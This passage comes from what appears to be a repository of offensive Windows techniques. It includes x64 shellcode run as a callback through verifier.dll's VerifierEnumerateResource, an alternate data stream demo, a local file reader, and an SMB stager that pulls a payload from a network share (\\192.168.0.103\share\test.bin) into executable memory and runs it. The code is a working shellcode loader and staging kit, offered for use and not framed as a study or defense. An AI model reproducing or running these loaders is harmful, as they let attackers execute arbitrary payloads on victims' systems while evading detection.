"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 25 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 26 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 27 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 28 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 29 
| "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 30 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 31 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 33 | "\x63\x2e\x65\x78\x65\x00"; 34 | 35 | 36 | 37 | int main() { 38 | 39 | 40 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 41 | ::RtlMoveMemory(addr, op, sizeof(op)); 42 | 43 | HMODULE lib = LoadLibraryW(L"verifier.dll"); 44 | 45 | VerifierEnumResourceFn VerifierEnumResource; 46 | 47 | *(FARPROC*)&VerifierEnumResource = GetProcAddress(lib,"VerifierEnumerateResource"); 48 | 49 | if (NULL == VerifierEnumResource) 50 | { 51 | printf("could not find entry point %s in verifier.dll\n", 52 | "VerifierEnumerateResource"); 53 | return GetLastError(); 54 | } 55 | 56 | VerifierEnumResource(::GetCurrentProcess(), NULL, AvrfResourceHeapAllocation, (AVRF_RESOURCE_ENUMERATE_CALLBACK)addr, NULL); 57 | 58 | } -------------------------------------------------------------------------------- /Shellcode Execution/VerifierEnumerateResource/VerifierEnumerateResource.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Staging Techniques/ADS_Stage.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void writeToADS(const char* fileName, const char* streamName, const char* data) { 
6 | char fullPath[MAX_PATH]; 7 | snprintf(fullPath, sizeof(fullPath), "%s:%s", fileName, streamName); 8 | 9 | FILE* file = fopen(fullPath, "wb"); 10 | if (file == NULL) { 11 | fprintf(stderr, "Error opening stream for writing.\n"); 12 | return; 13 | } 14 | 15 | fwrite(data, sizeof(char), strlen(data), file); 16 | fclose(file); 17 | printf("Data written to stream '%s' successfully.\n", streamName); 18 | } 19 | 20 | void readFromADS(const char* fileName, const char* streamName) { 21 | char fullPath[MAX_PATH]; 22 | snprintf(fullPath, sizeof(fullPath), "%s:%s", fileName, streamName); 23 | 24 | FILE* file = fopen(fullPath, "rb"); 25 | if (file == NULL) { 26 | fprintf(stderr, "Error opening stream for reading.\n"); 27 | return; 28 | } 29 | 30 | fseek(file, 0, SEEK_END); 31 | long size = ftell(file); 32 | fseek(file, 0, SEEK_SET); 33 | 34 | char* buffer = (char*)malloc(size + 1); 35 | if (buffer == NULL) { 36 | fprintf(stderr, "Memory allocation error.\n"); 37 | fclose(file); 38 | return; 39 | } 40 | 41 | fread(buffer, sizeof(char), size, file); 42 | buffer[size] = '\0'; // Null-terminate the string 43 | fclose(file); 44 | 45 | printf("Data read from stream '%s':\n%s\n", streamName, buffer); 46 | free(buffer); 47 | } 48 | 49 | int main() { 50 | const char* fileName = "example.txt"; 51 | const char* streamName = "myStream"; 52 | const char* data = "This is some data stored in an alternate data stream."; 53 | 54 | writeToADS(fileName, streamName, data); 55 | 56 | readFromADS(fileName, streamName); 57 | 58 | return 0; 59 | } 60 | -------------------------------------------------------------------------------- /Staging Techniques/Local_Stage.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Global variables 6 | unsigned char* buf = NULL; // Buffer to store file content 7 | DWORD size = 0; // Variable to store file size 8 | 9 | // Function to read binary file 10 | void readBin(const char* 
fileName) { 11 | FILE* file; 12 | 13 | file = fopen(fileName, "rb"); 14 | if (file == NULL) { 15 | fprintf(stderr, "Error opening file.\n"); 16 | return; 17 | } 18 | 19 | fseek(file, 0, SEEK_END); // Move to end of file 20 | size = ftell(file); // Get file size 21 | fseek(file, 0, SEEK_SET); // Move back to start of file 22 | 23 | buf = (unsigned char*)malloc(size * sizeof(char)); // Allocate memory for file content 24 | if (buf == NULL) { 25 | fprintf(stderr, "Memory allocation error.\n"); 26 | fclose(file); 27 | return; 28 | } 29 | 30 | fread(buf, sizeof(char), size, file); // Read file content into buffer 31 | fclose(file); 32 | 33 | printf("File read successfully. Size: %lu bytes.\n", size); 34 | } 35 | 36 | 37 | int main() { 38 | const char* fileName = "example.bin"; // Specify the binary file to read 39 | readBin(fileName); // Call the function to read the file 40 | 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /Staging Techniques/SMB_Stage.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | unsigned char buf[460] = ""; 5 | 6 | void readBin(const char* fileName){ 7 | FILE *file; 8 | DWORD file_length; 9 | 10 | HANDLE hFile = CreateFileA(fileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 11 | if(hFile == NULL) 12 | { 13 | printf("Error opening file: %d\n", GetLastError()); 14 | exit(-99); 15 | } 16 | 17 | BOOL rez = ReadFile(hFile, &buf, 460, NULL, NULL); 18 | if(rez == FALSE) 19 | { 20 | printf("Error reading file: %d\n", GetLastError()); 21 | exit(-98); 22 | } 23 | } 24 | 25 | int main() 26 | { 27 | LPVOID pAddr = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 28 | readBin("\\\\192.168.0.103\\share\\test.bin"); 29 | memcpy(pAddr, buf, sizeof(buf)); 30 | ((void(*)())pAddr)(); 31 | 32 | } 
--------------------------------------------------------------------------------